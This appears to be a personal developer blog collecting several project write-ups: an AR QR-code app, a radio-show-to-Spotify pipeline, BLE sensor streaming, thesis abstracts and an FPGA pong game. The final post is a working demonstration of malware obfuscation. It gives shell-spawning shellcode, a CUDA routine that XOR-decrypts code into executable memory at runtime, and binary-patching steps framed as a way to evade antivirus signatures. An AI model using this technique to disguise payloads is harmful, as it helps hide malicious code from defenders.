AR app for displaying QR image codes in react-native

As part of a side project I’m working on, I had to create an augmented reality application for reading QR codes that contained images and displaying them on screen. I have some experience in Android development with Android Studio and Java but I wanted to use a cross platform framework that targets both iOS and Android as the app itself was only going to be used as a demo. There are a lot of platfoms avaiable but since I had no experience with any of them I tried my luck with react native; a cross platform framework created by Facebook based on javascript.

As soon as I skimmed through the official documentation, I created a new react native project using

expo init ARQRCodes

and I was ready to analyze my requirements and start coding.

This app has 2 main features

  • Use the camera to find and track QR codes
  • Get the image URI and display it on top of the QR code

For tracking and scanning QR codes I used react-native-camera; a package that supports barcode scanning out of the box. Installing react native packages is quite easy and in this particular case I used

yarn add react-native-camera@git+https://git@github.com/react-native-community/react-native-camera.git

as I wanted to try out the master branch. After installing the package, enabling the camera was done by using the RNCamera tags and setting all the relevant information as seen below

import { RNCamera } from 'react-native-camera';

<RNCamera
  ref={ref => {
    this.camera = ref;
  }}
  style={styles.camera}
  type={RNCamera.Constants.Type.back}
  onGoogleVisionBarcodesDetected={ this.barcodeDetected }
  googleVisionBarcodeType={RNCamera.Constants.GoogleVisionBarcodeDetection.BarcodeType.QR_CODE}>
</RNCamera>

Some things to note are the constrains on the ‘googleVisionBarcodeType’, which in my case I only used QR codes and also, the ‘onGoogleVisionBarcodesDetected’ callback that gets invoked everytime a QR code will be identified.

Before moving forward I had to also update the ios/Podfile and run pod install as the development happend mostly on a Macbook

pod 'react-native-camera', path: '../node_modules/react-native-camera', subspecs: [
    'BarcodeDetectorMLKit'
]

Of course, accessing the camera needs permissions on both Android and iOS so, in order to make development easier I used react-native-permissions. Once installed with yarn, I had to update both my Podfile, Xcode and AndroidManifest.xml in order to ask for Camera permissions and add the following code in my App.js

request(Platform.OS === 'ios' ? PERMISSIONS.IOS.CAMERA : PERMISSIONS.ANDROID.CAMERA).then((result) => {
   setPermissionResult(result)
});

Note that RNCamera requires audio permissions by default so I had to disable this by adding this line in the RNCamera tag

captureAudio={false}

Once I had a way to identify QR codes the next step was to get the URIs and display them on the screen. Dowloading and displaying an image was again very easily done using another great package called react-native-fast-image that also handles image chaching. A sample code for doing this

<FastImage
    style={styles.image}
    source={{ 
         uri: data,
         priority: FastImage.priority.normal,
    }}
    resizeMode={FastImage.resizeMode.contain}
/>

Once I had the building blocks ready the next step was to put everything together. First, I had to implement my callback function, barcodeDetected, in order to update and re-render the app. This is done by calling setState and passing the new barcode information

barcodeDetected = ({ barcodes }) => {
    this.setState({ barcodes })
};

Next, I used the barcode information in order to draw the images on the screen using the FastImage package. After running few tests, I was ready to try it on my phone with various QR codes that I generated online using one of the many free websites that offer this functionality. Hopefully having multiple QR codes will render the images without any problems.

Here are the generated QR codes

and sure enough, when I tested the app on my phone, I was quite satisfied with the result!

Scanning three QR codes at the same time and displaying the images on screen.

Coming from a much different background, as I mostly work with low level languages like C/C++, at first I though that this project would be quite a big challenge as I’ve never worked with javascript before. Though, it turns out that modern day frameworks make development very easy and quite fast. Being able to hack a working app like this in 2 days without any prior knowledge shows how far things have come.

You can find the complete code on GitHub and the app on Google’s Play Store (will update with the link once it’s approved).

Creating a Spotify playlist from a radio show

Recently, I discovered a very interesting radio show hosted by Giannis Petridis on ert. Giannis is hosting one of the longest surviving radio shows in Greece and has one of the biggest record collections in the world. In his show he mostly suggests new artists and albums that are not promoted by mainstream media so it’s a great way for discovering new music. After listening a few of his shows I discovered some hidden gems so I started to think of a way to extract all these data without having to listen to all of his shows.

Data collection

Fortunately a lot of the shows are available on demand so first, I had to download everything locally. Ert’s website hosts the shows starting from 2017 up until today. After fiddling around the website I found that you can easily access the .mp3 files by a specific URL. The URLs follow a rather simple naming scheme which is {year}{month}{day} and some constant text. In order to store them locally I wrote this simple python script.

#!/usr/bin/python3

import requests

url = "https://audio.ert.gr/radio/proto/apo-tis-4-stis-5/{}{}{}-apo-tis-4-stis-5.mp3"

# Iterate through available dates
for year in range(2017, 2021):
    for month in range(1, 13):
        for day in range(1, 32):
            month_s = str(month)
            day_s = str(day)
            if month < 10:
                month_s = "0" + month_s
            if day < 10:
                day_s = "0" + day_s
            url_to_dl = url.format(str(year), month_s, day_s)
            response = requests.get(url_to_dl)
            total = response.headers.get('content-length')
            print(url_to_dl)
            if total is None:
                print("File not found")
            else:
                with open("./{}{}{}.mp3".format(str(year), month_s, day_s), 'wb') as f:
                    for data in response.iter_content(chunk_size=2048):
                        f.write(data)


After running the script for a while I ended up with 662 .mp3 files (~40Gb) that I had to somehow analyze and export the metadata.

Analyzing Data

The first thing that came to mind was to use a service like Shazam. Shazam is a music identification service where by submitting a short sample of audio it can identify which song that is. An interesting article about how audio identification works can be found here: https://oxygene.sk/2011/01/how-does-chromaprint-work/

Unfortunately Shazam does not offer an API but there are other services that we can use. I had a look at AcoustID, an open source audio identification service which comes with an open library of fingerprints but the drawback is that it matches only full length songs which means that I could not use it in the context of a radio show.

In the end I ended up with AudD, a paid service which provides a very simple API in order to identify audio files. The first approach that I used in order to identify all the songs was to split each radio show into 10sec segments and scan one every 10 segments in order to reduce the requests but also make sure that I wasn’t skipping any song. For splitting the tracks I used pydub.

The python script for doing this can be seen below.

#!/usr/bin/python3

import requests
import os
from pydub import AudioSegment

data = {
    'api_token': 'XXXXXXXXXXXXXXX',
    'return': 'apple_music,spotify',
}

# Iterate through files
directory = os.fsencode('.')

for file in os.listdir(directory):
    filename = os.fsdecode(file)
    filename_out = os.path.splitext(filename)[0] + '.json'
    if filename.endswith('.mp3'):
        print('Splitting: ' + filename)
        radio_show = AudioSegment.from_mp3(filename)
        # Split audio in 10 sec chucks and only use 1 every 60 sec.
        with open(filename_out, 'a+') as out_f:
            for i, chunk in enumerate(radio_show[::10000]):
                if not (i % 10):
                    continue
                chunk.export('temp.mp3', format='mp3')
                result = requests.post('https://api.audd.io/', data=data, files={'file' : open('temp.mp3', 'rb')})
                out_f.write(result.text)

The total amount of requests needed is around 166K which based on the service’s pricing would require $840. I tried to further reduce the requests by using 1 segment every 3 min given the assumption that each track is more than 3 min long. This drops the requests to ~55K but still, I needed something better.

Speech Segmentation

Ideally I’d want to split every raw file to segments of speech and music. This falls under the field of Speech Segmentation and as with everything nowadays there is a pre-trained python module called inaSpeechSegmenter that allows us to detect speech, music and speaker gender. After setting it up, the first thing was to try and segment a single radio show and check if the results are correct.

Running the code snippet below,

from inaSpeechSegmenter import Segmenter, seg2csv
media = './media/musanmix.mp3'
seg = Segmenter()
segmentation = seg(media)
print(segmentation)

yields the first results:

[('noEnergy', 0.0, 0.6), ('music', 0.6, 64.28), ('male', 64.28, 66.7), ('noEnergy', 66.7, 67.34), ('male', 67.34, 68.72), ('noEnergy', 68.72, 69.24), ('male', 69.24, 75.34), ('noEnergy', 75.34, 76.3), ('male', 76.3, 78.38), ('noEnergy', 78.38, 78.76), ('noise', 78.76, 79.08), ('noEnergy', 79.08, 79.52), ('male', 79.52, 84.5), ('noEnergy', 84.5, 86.06), ('male', 86.06, 88.08), ('noEnergy', 88.08, 88.7), ('male', 88.7, 90.9), ('noEnergy', 90.9, 91.60000000000001), ('male', 91.60000000000001, 95.06), ('noEnergy', 95.06, 96.06), ('music', 96.06, 128.9), ('male', 128.9, 144.04), ('noEnergy', 144.04, 144.68), ('male', 144.68, 155.4), ('noEnergy', 155.4, 156.58), ('male', 156.58, 158.34), ('noEnergy', 158.34, 158.96), ('male', 158.96, 160.38), ('noEnergy', 160.38, 160.88), ('male', 160.88, 162.86), ('noEnergy', 162.86, 164.22), ('male', 164.22, 166.34), ('noEnergy', 166.34, 167.48), ('male', 167.48, 179.72), ('noEnergy', 179.72, 180.74), ('male', 180.74, 182.42000000000002), ('noEnergy', 182.42000000000002, 184.0), ('male', 184.0, 198.4), ('noEnergy', 198.4, 198.84), ('male', 198.84, 212.34), ('noEnergy', 212.34, 212.72), ('male', 212.72, 274.08), ('music', 274.08, 279.26), ('noise', 279.26, 287.88), ('music', 287.88, 289.78000000000003), ('noise', 289.78000000000003, 292.38), ('music', 292.38, 298.5), ('male', 298.5, 309.74), ('noEnergy', 309.74, 310.32), ('male', 310.32, 362.06), ('noEnergy', 362.06, 362.7), ('male', 362.7, 364.0), ('noEnergy', 364.0, 364.66), ('male', 364.66, 406.46000000000004), ('noEnergy', 406.46000000000004, 406.96000000000004), ('male', 406.96000000000004, 494.76), ('noEnergy', 494.76, 495.22), ('male', 495.22, 503.76), ('noEnergy', 503.76, 504.24), ('male', 504.24, 553.1800000000001), ('noEnergy', 553.1800000000001, 554.16), ('male', 554.16, 563.6), ('female', 563.6, 568.66), ('male', 568.66, 581.78), ('noEnergy', 581.78, 582.22), ('male', 582.22, 601.22), ('noEnergy', 601.22, 601.6800000000001), ('male', 601.6800000000001, 606.44), ('noEnergy', 606.44, 607.14), ('male', 607.14, 607.66), ('noEnergy', 607.66, 608.0600000000001), ('male', 608.0600000000001, 643.32), ('noEnergy', 643.32, 643.72), ('male', 643.72, 647.1800000000001), ('noEnergy', 647.1800000000001, 647.76), ('male', 647.76, 665.88), ('noEnergy', 665.88, 666.3000000000001), ('male', 666.3000000000001, 694.38), ('noEnergy', 694.38, 694.78), ('male', 694.78, 712.02), ('noEnergy', 712.02, 712.46), ('male', 712.46, 760.72), ('noEnergy', 760.72, 762.3000000000001), ('noise', 762.3000000000001, 772.66), ('music', 772.66, 877.4200000000001), ('noise', 877.4200000000001, 881.9200000000001), ('noEnergy', 881.9200000000001, 882.52), ('male', 882.52, 916.12), ('noEnergy', 916.12, 916.62), ('male', 916.62, 928.74), ('noEnergy', 928.74, 929.3000000000001), ('male', 929.3000000000001, 940.4200000000001), ('noEnergy', 940.4200000000001, 941.12), ('male', 941.12, 943.38), ('noEnergy', 943.38, 943.84), ('male', 943.84, 963.46), ('music', 963.46, 1185.58), ('noEnergy', 1185.58, 1187.22), ('music', 1187.22, 1202.66), ('male', 1202.66, 1215.08), ('music', 1215.08, 1221.34), ('male', 1221.34, 1254.8600000000001), ('music', 1254.8600000000001, 1258.84), ('male', 1258.84, 1296.72), ('music', 1296.72, 1432.38), ('male', 1432.38, 1467.04), ('noEnergy', 1467.04, 1467.58), ('male', 1467.58, 1473.68), ('noEnergy', 1473.68, 1474.76), ('male', 1474.76, 1480.68), ('music', 1480.68, 1490.84), ('male', 1490.84, 1493.14), ('music', 1493.14, 1762.32), ('male', 1762.32, 1781.02), ('noEnergy', 1781.02, 1781.72), ('male', 1781.72, 1817.4), ('noEnergy', 1817.4, 1818.26), ('male', 1818.26, 1826.16), ('noEnergy', 1826.16, 1827.1000000000001), ('male', 1827.1000000000001, 1828.02), ('noEnergy', 1828.02, 1828.48), ('male', 1828.48, 1831.06), ('noEnergy', 1831.06, 1831.6000000000001), ('music', 1831.6000000000001, 1835.74), ('male', 1835.74, 1838.78), ('music', 1838.78, 1841.28), ('male', 1841.28, 1847.22), ('music', 1847.22, 2053.06), ('male', 2053.06, 2058.02), ('music', 2058.02, 2059.38), ('male', 2059.38, 2090.3), ('noEnergy', 2090.3, 2090.7), ('male', 2090.7, 2098.68), ('noEnergy', 2098.68, 2099.92), ('male', 2099.92, 2105.68), ('noEnergy', 2105.68, 2106.76), ('male', 2106.76, 2110.16), ('noEnergy', 2110.16, 2111.0), ('male', 2111.0, 2115.2200000000003), ('noEnergy', 2115.2200000000003, 2116.44), ('male', 2116.44, 2127.06), ('music', 2127.06, 2130.8), ('male', 2130.8, 2132.44), ('music', 2132.44, 2309.18), ('male', 2309.18, 2346.04), ('noEnergy', 2346.04, 2346.44), ('male', 2346.44, 2352.9), ('noEnergy', 2352.9, 2354.38), ('male', 2354.38, 2383.58), ('music', 2383.58, 2474.7200000000003), ('male', 2474.7200000000003, 2513.5), ('noEnergy', 2513.5, 2514.2200000000003), ('male', 2514.2200000000003, 2538.7000000000003), ('noEnergy', 2538.7000000000003, 2541.9), ('male', 2541.9, 2546.0), ('music', 2546.0, 2547.7200000000003), ('female', 2547.7200000000003, 2548.64), ('noEnergy', 2548.64, 2550.12), ('music', 2550.12, 2618.9), ('noEnergy', 2618.9, 2619.78), ('music', 2619.78, 2666.78), ('noEnergy', 2666.78, 2667.66), ('music', 2667.66, 2762.86), ('noEnergy', 2762.86, 2764.2400000000002), ('music', 2764.2400000000002, 2778.4), ('noEnergy', 2778.4, 2779.62), ('music', 2779.62, 2804.2400000000002), ('noEnergy', 2804.2400000000002, 2806.64)]

Opening the file, I was happy to verify that the music segments matched exactly. Putting everything together I created a script that will take a 10s sample from each segment and send it for identification to AudD.

#!/usr/bin/python3

import requests
import os
import sys
from inaSpeechSegmenter import Segmenter, seg2csv
from pydub import AudioSegment

data = {
    'api_token': 'XXXXXXXXXXXXXXX',
    'return': 'spotify',
}

if (len(sys.argv)) < 3:
    print('Usage: ' + sys.argv[0] + ' <input.mp3> <output.json>')
    sys.exit(0)

filename = sys.argv[1]
filename_out = sys.argv[2]

# Segment audio
seg = Segmenter()
segmentation = seg(filename)

# Get music timestamps and keep only
# the ones that are >10s
music_timestamps = [m for m in segmentation if ((m[0] == 'music') and (m[2] - m [1] > 10))]

total_requests = 0

# Iterate timestamps and send for identification
radio_show = AudioSegment.from_mp3(filename)

with open(filename_out, 'a+') as out_f:
    for m in music_timestamps:
        start_ms = int(m[1] * 1000)
        chunk = radio_show[start_ms:start_ms + 10000]
        chunk.export('temp.mp3', format='mp3')
        result = requests.post('https://api.audd.io/', data=data, files={'file' : open('temp.mp3', 'rb')})
        total_requests += 1
        out_f.write(result.text)

print(total_requests)

Spotify playlist

After I got the json response with the songs the next step was to create a Spotify playlist. The first step was to register a new app on Spotify for developers

and then I used spotipy in order to access the API and add the tracks to my playlist:

#!/usr/bin/python3

import spotipy
from spotipy.oauth2 import SpotifyOAuth

sp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id="XXXX",
                                               client_secret="XXXX",
                                               redirect_uri="https://mispyrou.com",
                                               scope="playlist-modify-private playlist-modify",				
	                                       open_browser=False))

playlist_url = 'https://open.spotify.com/playlist/66bZtV2zrv49F28hS8ffbk'
username = 'mpekatsoula'

track_ids = ['TRACK_01', 'TRACK_O2']
results = sp.user_playlist_add_tracks(username, playlist_url, track_ids)
 

After putting everything together and by making sure that I don’t add any duplicate songs, it was time to run the script. Running it on a single 60min radio show takes around 2min on a NVIDIA GTX 1060 which is quite reasonable.

The gereated Spotify playlist

And in case you are still wondering, I managed to drop my total requests to AudD to ~10K!

Transmitting EMG data over BLE using BBC micro:bit

Recently I took part in a challenge organized by ARM Ltd which involved using a BBC micro:bit as the main processing board in an EMG sensor device. The device sends electrode sensor readings through BLE to an Android phone, and then data are displayed on a real time graph. This project was done in collaboration with Thomas Poulet and George Kopanas. The overall project setup is shown is the picture below:

You can find more info about the EMG sensors and how they are connected to the micro:bit here.

Bluetooth low energy

BBC micro:bit comes with a Bluetooth low energy (BLE) antenna, which is designed for reduced power consumption thus making it perfect for our use as we need to continuously transmit EMG sensor data. The micro:bit is configured as a server that waits for GATT requests and sends data, and our android phone is the client that initiates the connection and receives the data from the EMG sensor.  We use Nordic’s nRF UART over BLE in order to transmit data.

Transmitting data through RX Characteristic

Connecting the phone with the micro:bit is pretty trivial on Android. There is a code sample from Google and you can find all the required information on their developer site.

First we have to scan for the avaiable devices and then select the one we want to connect to (in our case micro:bit). After the connection is initialized we enable indication by enabling ENABLE_INDICATION_VALUE flag and we wait for data sent from micro:bit. Data are sent to RX Characteristic (UUID: 6E400003-B5A3-F393-E0A9-E50E24DCCA9E) and then data are plotted to the phone screen using Graphview.

Here are some pictures and a video of how things look when everything is connected:

Runtime support for approximate computing in heterogeneous systems

In my MSc Thesis, titled “Runtime support for approximate computing in heterogeneous systems”, I developed a run-time system in C programming language that supports approximate  computations using OpenCL.

Abstract

Energy efficiency is the most important aspect in nowadays systems, ranging from embedded devices to high performance computers. However, the end of Dennard scaling limits expectations for energy efficiency improvements in future devices, despite manufacturing processors in lower geometries and lowering supply voltage. Many recent systems use a wide range of power managing techniques, such as DFS and DVFS, in order to balance the demanding needs for higher performance/throughput with the impact of aggressive power consumption and negative thermal effects. However these techniques have their limitations when it comes to CPU intensive workloads.

Heterogeneous systems appeared as a promising alternative to multicores and multiprocessors. They offer unprecedented performance
and energy efficiency for certain classes of workloads, however at significantly increased development effort: programmers have to spend significant effort reasoning on code mapping and optimization, synchronization, and data transfers among different devices and address
spaces. One contributing factor to the energy footprint of current software is that all parts of the program are considered equally important for the quality of the final result, thus all are executed at full accuracy. Some application domains, such as big-data, video and image processing etc., are amenable to approximations, meaning that some portions of the application can be executed with less accuracy, without having a big impact on the output result.

In this MSc thesis we designed and implemented a runtime system, which serves as the back-end for the compilation and profiling infrastructure of a task-based meta-programming model on top of OpenCL. We give the opportunity to the programmer to provide approximate functions that require less energy and also give her the freedom to express the relative  importance of different computations for the quality of the output, thus facilitating the dynamic exploration of energy / quality trade-offs in a disciplined way. Also we simplify the development of parallel algorithms on heterogeneous systems, relieving the programmer from tasks such as work scheduling and data manipulation across address spaces. We evaluate our approach using a number of real-world applications, from domains such as finance, computer vision, iterative equation solvers and computer simulation.

Our results indicate that significant energy savings can be achieved by combining the execution on heterogeneous systems with approximations, with graceful degradation of output quality. Also, hiding the underlying memory hierarchy from the programmer, performing data dependency analysis and scheduling work transparently, results in faster development without sacrificing the performance of the applications.

Performance and power prediction on heterogeneous systems using statistical methods

 Abstract

Heterogeneous systems provide high computing performance, combining low cost and low power consumption. These systems include various computational resources with different architectures, such as CPUs, GPUs, DSPs or FPGAs. It is crucial to have full knowledge of these architectures, but also of the programming models used in order to increase the performance on a heterogeneous system.

One way to achieve this goal, is the prediction of the execution time on the different computational resources, using statistical values which we collect with the use of hardware counters. The purpose of this thesis is to increase the performance of a heterogeneous system using the data we collected by training a statistical model which will predict the execution time. Further goal is to use this prediction model inside a run-time scheduler which will migrate the running application in order to decrease the execution time and increase the overall performance.

We used various statistical models, such as linear regression, neural networks and random forests and we predicted the execution time to Intel CPUs and NVIDIA GPUs, with different levels of success.

Two player pong game using accelerometers

This two person project was completed through the course of Embedded Systems at the University of Thessaly, Department of Computer Engineering. In the context of this project we implemented the classic pong game using a Spartan 6 FPGA, and two 3-axis accelerometers. The code is in Verilog and you can find it on github ( link at the bottom of the page ). The project consists two parts. First, the connection with the monitor through the VGA and game logic and the connection of the accelerometers through the SPI interface.

VGA Technology and Implementation

The first part of the project was to connect the FPGA with a monitor using the VGA output. VGA is a video standard mainly used for computer monitors introduced by IBM in 1987.

VGA video is a stream of frames. Each frame is made of horizontal and vertical series of pixels which are transmitted from top to bottom and from left to right, like a beam is traveling through the screen (CRT displays actually used a moving electron beam, but LCD displays have evolved to use the same signal timings as CRT displays). Information is only displayed when the beam is moving forward and not during the time the beam is reset back to the left or top edge of the display.

First we made a VGA controller module that generates the correct signals. The signals that we need to pass to the VGA DAC (Digital to Analog Converter) are:

• Pixel clock
• Vertical Sync
• Horizontal Sync
• 3-bit Red
• 3-bit Green
• 2-bit Blue

Pixel clock defines the time available to display one pixel of information. With different timing values we can achieve several resolutions, such as 800×600 etc. Vertical sync defines the refresh rate of the display and horizontal sync is used to indicate the end of a horizontal line. We use two counters, hcount and vcount that count the pixels in the horizontal and vertical lines. We can determine the location of a pixel in the screen (x,y) by combining these two counters.

Each line of the video begins with an active video region, in which RGB values are output for each pixel in the line. Then a blanking region follows in which a horizontal sync pulse is transmitted in the middle of the blanking interval. The interval before the sync pulse is known as front porch and after the sync pulse back porch.

There are many VGA timing values that can be used, in order to support several resolutions, as we can see in the table below:

For our project we had a resolution of 800×600@72Hz, so we created a 50 MHz clock, from the 100 MHz clock input of the Spartan 6 and the horizontal and the vertical count have a total value of 1039 and 665 respectively. Based on these numbers we calculate the exact time that the hsync and vsync are set active high (both signals on this resolution must be active high) and we connect them to the FPGA pins.

Pong Game

Based on the VGA module we draw on the screen basic shapes such as the paddles and a square dot that represents the ball. The paddle drawing is done at the draw_shape module that given the (x,y) position of the top left pixel, creates a 128×16 pixels rectangle. The same happens with the ball that is 32×32 pixels. Also we have a module that creates the game board; four lines for the perimeter of the screen and one vertical line at the half of the board. Each of these modules, output the pixel locations of each shape.
Ball_movement module takes as input the location of the paddles and the ball and does the necessary calculations for the ball movement. Ball moves at a constant speed of one pixel in x axis and one pixel in y axis. If ball hits the up or down board limit or one of the paddles the trajectory is changed. Also in this module we check if the ball hits the right or left limit, and if yes, a signal is generated to indicate that a player has won a point. Whenever a player wins the score is updated and displayed on the screen. If a player’s score reaches 10 points then the game is over and a message indicating which player has lost is shown. Then the game resets to its initial state. Finally this module outputs the pixel locations of the ball and the paddles and they are driven to the output_pixels module that generates the final output that the monitor will display.

A snippet of the code that checks if the ball has hit the paddle:

// Find collision between ball and the paddles
if ( ((ball_y <= paddle1 + 128) && ( (ball_y >= paddle1 - 32) || ( paddle1 <= 32 && ball_y <= 128 ) )) && ball_x == 18 )
sw_x <= 1;
 
if ( ((ball_y <= paddle2 + 128) && ((ball_y >= paddle2 - 32) || ( paddle2 <= 32 && ball_y <= 128 ) )) && ball_x == 750 )
sw_x <= 0;

The numbers showing the score are in seven segment display format output and are generated in the draw_score module. Also we implemented a pause game function by activating the switch T5.
Since Nexys 3 board has a reset button that only erases completely any program loaded, we use switch V8 as a reset signal for our project.

3-Axis accelerometers

An accelerometer is an electromechanical device that will measure acceleration forces. These forces may be static, like the constant force of gravity, or they could be dynamic caused by moving the accelerometer. There are different types of accelerometers depending on how they work. Some accelerometers use the piezoelectric effect; they contain microscopic crystal structures that get stressed by accelerative forces, which cause a voltage to be generated. Others implement capacitive sensing, that output a voltage dependent on the distance between two planar surfaces.

In our implementation we used a 3-axis (one axis for each direction) digital accelerometer powered by the analog device ADXL345 and took advantage of the force of gravity on y axis, making the paddles move by tilting the accelerometer right or left. We connected the accelerometers through the SPI interfaces. SPI operates in full duplex mode and uses four signals: Slave select (SS), serial clock (SCLK), serial data out (SDO), to the accelerometer and serial data in (SDI), from the accelerometer. Devices communicate in master/slave mode where master initiates the data frame. Our setup contains two shift registers, one in the master and one in the slave and they are connected as a ring. Data is shifted out with the most significant bit first, while shifting a new least significant bit into the same register.

We initialize the transfer with a 5Hz clock and we transmit/receive data at 22.4 kHz rate. The accelerometer is configured for +/- 2g operation. To convert the output to g we have to find the difference between the measured output and the zero-g offset and divide it by the accelerometer’s sensitivity (expressed in counts/g or LSB/g). For our accelerometer in 2g sensitivity with 10-bit digital outputs, the sensitivity is 163 counts/g or LSB/g. The acceleration would be equal to: 𝑎=(Aout−zerog)163 g. We didn’t have to make those calculations for the paddle movement. We just take the accelerometer output and we move the paddles accordingly based on the table below:

Verilog Diagrams

In game screenshots:

GPU assisted ELF binary decryption

Usually a malware writer, or a closed source product, use some techniques in order to make the binaries difficult to read. In one hand, the anti-virus are unable to read the signature of the malware and on the other, a reverse engineer’s life becomes difficult.
One technique (usually not implemented alone), is to encrypt some portions of the code and decrypt them at runtime, or better decrypt each time the code we want to run and then encrypt it back.
As GPU’s have extremely high computational power, we can have really complex functions for encrypting and decrypting our code. I’ve made a really simple example of a self-decrypting application and i’ll try to explain this step by step.

So, what is our program going to do? Well it will spawn a shell. The assembly code (we need assembly code so it can be portable) to do that is:

global _shell
 
_shell:
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80

You can find codes like this freely available on the internet (this one is written by kernel panik), or you can make your own if you want specific things to be done (or just want to learn). We want our code to be portable, and not containing relative addresses.

Now that we have our assembly code, we compile it to an object file:

nasm shell.asm -f elf32 -o shell.o

Then, we have to write code for the self-decrypting binary. A simple example can be found below, written in C for CUDA:

#include <stdio.h>
#include <sys/mman.h>
#include <cuda.h>
 
#define len 21
 
__global__ void decrypt(unsigned char *code){
 
int indx = threadIdx.x;
code[indx] ^= 12;
 
}
 
extern "C" void _shell();
 
int main(void){
 
unsigned char *p = (unsigned char*)_shell;
unsigned char *d_shell,*h_shell;
 
h_shell = (unsigned char *)malloc(sizeof(char)*len);
 
int i;
for(i=0;i<len;i++){
h_shell[i] = *p;
p++;
}
cudaMalloc((void **) &d_shell, sizeof(char)*len);
cudaMemcpy(d_shell, h_shell, sizeof(char)*len, cudaMemcpyHostToDevice);
decrypt<<<1,len>>>(d_shell);
cudaMemcpy(h_shell, d_shell, sizeof(char)*len, cudaMemcpyDeviceToHost);
cudaFree(d_shell);
char *d=(char *)mmap(NULL, len,PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON,-1,0);
 
memcpy(d,h_shell,len);
 
((void(*)(void))d)();
}

Now let’s explain some things. First of all we have to find the length of the instructions. There a few ways to do this and I choose this project by oblique here:https://github.com/oblique/insn_len that can do that very easily.

Now, some of you may wonder why I am mmaping and memcpying. Well there are some protections around, that prevent us from writing to some portions of memory such as .text. So we have to load our encrypted code, decrypt it and mmap it to a new portion of memory that can be executed. This is where our flags go. After that we are ready to execute our code.

In our example we use a simple xor decryption with a fixed key, but you can have a more complex stream cipher function like RC4 ect. Also you do not need to have a key saved in the binary, but brute force it until the code “makes sense”. With such a computation power it is pretty easy.

Now we compile our source code with nvcc and link it:

nvcc shell_spawn.cu -c
gcc shell_spawn.o shell.o -o shell_spawn -L/usr/local/cuda/lib -lcudart

And now we have our executable! But first we have to patch our binary with our encrypted function. The reason why we used stream ciphers is because we don not want to change the size of our function, and make things more complex. One simple way to patch our elf binary is simply by opening it with a hex editor ( i used Bless), and find the code we want to patch. But how? It’s simple:

objdump -d -j .text shell_spawn

and if you search you will see the _shell function:

8048a30:    31 c9                  xor    %ecx,%ecx
8048a32:    f7 e1                  mul    %ecx
8048a34:    51                     push   %ecx
8048a35:    68 2f 2f 73 68         push   $0x68732f2f
8048a3a:    68 2f 62 69 6e         push   $0x6e69622f
8048a3f:    89 e3                  mov    %esp,%ebx
8048a41:    b0 0b                  mov    $0xb,%al
8048a43:    cd 80                  int    $0x80

Now we simply encrypt the op codes. I used xor 12 so my output is this:

3dc5fbed5d6423237f6464236e656285efbc07c18c

We open our hex editor, load our binary and replace our old _shell function with our encrypted one:

After that we save our file and if we execute it we can see that a shell spawns!

If we objdump our file, we can see our function _shell, but this time is doing random stuff :

8048a30:    3d c5 fb ed 5d  cmp  $0x5dedfbc5,%eax
8048a35:    64 23 23        and  %fs:(%ebx),%esp
8048a38:    7f 64           jg 8048a9e <__libc_csu_init+0x4e>
8048a3a:    64 23 6e 65     and %fs:0x65(%esi),%ebp
8048a3e:    62 85 ef bc 07 c1   bound  %eax,-0x3ef84311(%ebp)
8048a44:    8c 90 90 90 90 90    mov    %ss,-0x6f6f6f70(%eax)

You can find my source also on github here: https://github.com/mpekatsoula/gpu_ad

I want to develop a strong cipher and find a better way to patch my binary, so this is just the idea. If someone wants to go deeper i’d like to hear new ideas. Until then, feel free to comment, point mistakes etc

Sources

[1]: GPU Assisted malware